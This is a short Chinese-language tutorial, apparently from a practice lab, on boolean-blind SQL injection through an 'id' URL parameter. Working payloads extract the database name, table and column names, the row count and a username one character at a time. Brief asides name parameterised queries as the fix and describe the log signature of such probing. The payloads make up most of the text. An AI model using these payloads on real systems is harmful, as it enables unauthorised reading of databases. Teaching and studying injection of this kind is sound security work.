获取数据库名
本页的请求属于布尔盲注：条件为真与为假时页面返回不同，据此逐项判断。其前提是 id 参数被直接拼接进 SQL 语句；改用参数化查询后，这些条件只会被当作普通数据处理。
长度：
?id=2' and length(database())=8 --+
逐字猜解：
?id=2' and substr(database(),1,1)='s' --+
?id=2' and substr(database(),2,1)='e' --+
获取数据表
长度（当前库第一张表的表名）：
?id=2' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+
逐字猜解：
?id=2' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' --+
?id=2' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='a' --+
这类逐位探测在访问日志中通常表现为同一参数的大量相似请求，参数值里反复出现 length(、substr( 和 information_schema。
获取列名
长度（0x7573657273 是表名 users 的十六进制写法）：
?id=2' and length((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1))=4 --+
逐字猜解：
?id=2' and substr((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1),1,1)='u' --+
?id=2' and substr((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1),1,1)='s' --+
（第二条的位置参数与第一条同为 1,1，按前文的写法应为 2,1，原文疑为笔误。）
获取字段(行)
行数（共 14 行，对 count(*) 的结果按位比较）：
?id=2' and substr((Select count(*) from users),1,1)='1' --+
?id=2' and substr((Select count(*) from users),2,1)='4' --+
username 列第一行的值：
长度：
?id=2' and length((Select username from users limit 0,1))=4 --+
逐字猜解：
?id=2' and substr((Select username from users limit 0,1),1,1)="d" --+